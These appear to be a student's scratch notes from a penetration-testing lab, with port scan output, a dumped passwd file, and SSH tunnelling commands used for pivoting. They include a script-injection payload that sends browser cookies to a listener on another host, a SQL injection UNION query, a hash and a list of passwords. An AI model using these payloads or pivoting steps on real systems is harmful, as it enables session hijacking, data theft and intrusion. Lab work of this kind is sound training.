10.100.28.40
80/tcp   open  http
4444/tcp open  krb524

PORT     STATE SERVICE
80/tcp   open  http
| http-enum: 
|   /robots.txt: Robots file
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
/net_test
/Contract_bids.html
/TT
4444/tcp open  krb524


; ls /var/ww/html
/var/www/html/net_test
billybob

root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/bash
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
billybob:x:1001:1001:you found me QzivT2SHKiSmAoa6xtry:/home/billybob:/bin/bash

/home/romanoff@mi.ru/contracts 

student@lin-ops:~$ nc -lk 10.50.188.39 42069

<script>document.location="http://10.50.188.39:42069/?username=" + document.cookie;</script>

SHA256:cG1PduaGk/fLmUlWy1xTHIUCC+K9ABIbkAWxZUNMgPI student@lin-ops


------------------------------------------------------------------------------------------------------------------------
ssh -MS /tmp/sqldemo demo1@10.50.12.21
ssh -S /tmp/sqldemo sqldemo -O 


student@lin-ops:~$ ssh -MS /tmp/sql agent@10.50.15.242
student@lin-ops:~$ ssh -S /tmp/sql agent@10.50.15.242
student@lin-ops:~$ ssh -S /tmp/sql sql -O forward -L1212:10.100.28.48:80

127.0.0.1:1212

category= 2 UNION SELECT Name,Description,Level FROM sqlinjection.permissions

79bc18f6cbd3b2290cbd69c190d62bc6

teaatime
waterbender123
firebender123       PASSWORD
Zuko
Aang
